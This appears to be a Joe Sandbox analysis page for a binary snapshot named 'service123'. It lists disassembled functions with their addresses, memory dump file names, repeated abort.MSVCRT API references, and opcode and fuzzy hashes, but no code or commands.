Function 6C428250 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c087bf13af5f7cab3d59f76a63347b27eeae095c83f773d32c429cb8ad82bd08
Instruction ID: 65b580f48ca7ee6e5d03934a725bb60151f7f23e5bc9be6dc63f65f52b64c1ba
Opcode Fuzzy Hash: c087bf13af5f7cab3d59f76a63347b27eeae095c83f773d32c429cb8ad82bd08
Instruction Fuzzy Hash: 97017172A0C2408FC300EF7A848152BBBF06F5A204F45D85EE988CB359E235C405CF67

Function 6C3AD2B4 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ee32aa5ad927b1dc4a83478f86cfe336878b9b3e5cb2284810fcf843c81a86
Instruction ID: d5fd0604719bcb361a27eeaab1bf3539dc028dba6aa42b66baed214569e50ecb
Opcode Fuzzy Hash: 95ee32aa5ad927b1dc4a83478f86cfe336878b9b3e5cb2284810fcf843c81a86
Instruction Fuzzy Hash: B0019EB1A062019BEB04EF69C480BAAFBE4EF85344F50856DD8888B741D372D856CBD2

Function 6C454110 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6636d41bd1b541761024a2e6c029ee238c6645b00dc04b20d2c29c6e991a4db2
Instruction ID: 8b4b5af4bf4279ad4e5f324251f6abb49278a6bfe9d5e39f37a6d53e0e03c861
Opcode Fuzzy Hash: 6636d41bd1b541761024a2e6c029ee238c6645b00dc04b20d2c29c6e991a4db2
Instruction Fuzzy Hash: 0BF01D36A0C1408FC710FE7D9946D6ABBF0674A258FC99958D958CBB09E234D4248EA7

Function 6C3D9F90 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04441b02f7bef104b233f834c3cf4f643bb082ff01def0a64056b26acc15a899
Instruction ID: 1e765d2bb6edd5667267a6b208e05cc5c01c54e7076b4e9818d0066094aa73e7
Opcode Fuzzy Hash: 04441b02f7bef104b233f834c3cf4f643bb082ff01def0a64056b26acc15a899
Instruction Fuzzy Hash: A0D01232E081009F8B00EE69D54041AF7B0AB46208B54D544D54C97609DB32E4068F9A

Function 6C3AD424 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f47961f71c532a5ba7c31f82db50096166d24a052be1b17e5d052e010392cb2e
Instruction ID: 6a1eed8bb96bc65d71c810a797b4438f8c58b3bd52d8088a25b69feb1ebb826e
Opcode Fuzzy Hash: f47961f71c532a5ba7c31f82db50096166d24a052be1b17e5d052e010392cb2e
Instruction Fuzzy Hash: 30C0C9718011004A8F40EF6480809B8B2F0AB42244B925868C08497600DB31D8468A46

Function 6C3AD5A4 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0d6367cb766bfedf8e938575c0c5d72422501bc95d77e19ba91109e056c638
Instruction ID: 25589f7fe1e926cb8bc685c005adeb0544e8543cbbf67a19ad0fbf526dd56e9d
Opcode Fuzzy Hash: 5a0d6367cb766bfedf8e938575c0c5d72422501bc95d77e19ba91109e056c638
Instruction Fuzzy Hash: 7BC0CA728011008A8F00EF64C080AB8B2F0AB82288B5228A8C084EB600EB31CC86CA86

Function 6C3AD724 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 775594ecdda66c0ce29efa73e70a845c825609a65366644225eeb35c10ba540a
Instruction ID: 6b13e2ac714374b8c09cc66791af1138f8f1b3425dc7efa309dd9236f13449a0
Opcode Fuzzy Hash: 775594ecdda66c0ce29efa73e70a845c825609a65366644225eeb35c10ba540a
Instruction Fuzzy Hash: 93C012719011104BCF00EF74C0C097CF6F0AB42248F525868C084D7600DB71C846CF86

Function 6C39AF80 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction ID: 80dc2d27d8f10d36b2a44fb1650c9a3eecbe093185d534d5b862bc1293ca6c2d
Opcode Fuzzy Hash: e4782c14483e89b401938c8b91bc0639d669efe6f4935ac7e28a15c2c01b6abe
Instruction Fuzzy Hash: 92C08CB0C053408BD200FF38D20AA2CFAB0AF42208FC46CACE48013302EB35C42C869B

Function 6C38BAD0 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 339COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Strings

@, xrefs: 6C38BAB1

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 56026410d83e3125d52f5474081380bf6a2903cb18b37f9fa0f32cba8e67f57f
Instruction ID: f8077e53c5052ee157bb987336e0be1a773c4b303598103fb1e8905c31da6847
Opcode Fuzzy Hash: 56026410d83e3125d52f5474081380bf6a2903cb18b37f9fa0f32cba8e67f57f
Instruction Fuzzy Hash: 4EB1473160A31B8FC310CE2CC890B95B7E6AB8532CF89497DD9959BB95D335E918CF81

Function 6C382290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 810d2874d92a4b61f530ec68a51420228dde0c260936ebf211628ad980666753
Instruction ID: 53ab628e6d4fc506d6fc1ee8c619695f64d191df2a4ee4c613750c4b7c407efe
Opcode Fuzzy Hash: 810d2874d92a4b61f530ec68a51420228dde0c260936ebf211628ad980666753
Instruction Fuzzy Hash: F4C111706063018FDB04CF29C59475AB7E2BF45318F158969D898CFB45E77AE90ACFA0

Function 6C38B7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672750a21ffb922d5b41317e7e1cc8507d7a15a45265e1f4a96aab9d3d5908d6
Instruction ID: f2b18aeb9febf0623a7eb4c106c8de3f798c069c0abff66257e94573f639beea
Opcode Fuzzy Hash: 672750a21ffb922d5b41317e7e1cc8507d7a15a45265e1f4a96aab9d3d5908d6
Instruction Fuzzy Hash: BA41D57150A7869FDB11CF29C880B16BBE0AF4532CF58859DEA954FB56C332E845CF41

Function 6C3828FA Relevance: 42.1, APIs: 28, Instructions: 84COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C456CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 24664d235c9ab869cda0d960a841041cd37e8f30fa7dbcff5afe23a118311c1d
Instruction ID: e48caec4d2c163f67b7a458ec625c62f50e05f1ea54c83e2c98cc594d0313ec0
Opcode Fuzzy Hash: 24664d235c9ab869cda0d960a841041cd37e8f30fa7dbcff5afe23a118311c1d
Instruction Fuzzy Hash: 301180B2606201CBE708EF18E891F56B7B0FB11309F119A58D184D7A15D779E818CFA5

Function 6C382A2F Relevance: 42.1, APIs: 28, Instructions: 82COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C456CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425743931.000000006C4A8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425759102.000000006C4A9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425777113.000000006C4AC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c380000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 8697fb5839e5ee2d1cca09b9a98e3b6d9e7b4fcad365c043818c68ee4d923d63
Instruction ID: a5b15bade2b728fe6acc9afedbe0d4ab70141d5b2963fb231d3529df9ece3d62
Opcode Fuzzy Hash: 8697fb5839e5ee2d1cca09b9a98e3b6d9e7b4fcad365c043818c68ee4d923d63
Instruction Fuzzy Hash: 8411D0B2606201CFE708EF18E892F56B7B0FB11309F019A48D184CBB15D738E828CFA1

Function 6C3829F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C456CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D03
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D08
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D12
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D17
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D21
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D26
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D30
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D35
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C38C5DB), ref: 6C456D44
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D4C
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D51
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D56
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D5B
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D60
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D65
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6A
abort.MSVCRT(?,?,?,?,?,?,6C38E2F4,?,?,?,?,?,?,00000000,00000001,6C39008D), ref: 6C456D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C39038F), ref: 6C456D7E

Memory Dump Source

Source File: 00000004.00000002.3425541336.000000006C381000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C380000, based on PE: true

Associated: 00000004.00000002.3425492148.000000006C380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425640639.000000006C45D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3425681617.000000006C45F000.00000002.00000001.01000000.00000006.sdmpDownload File
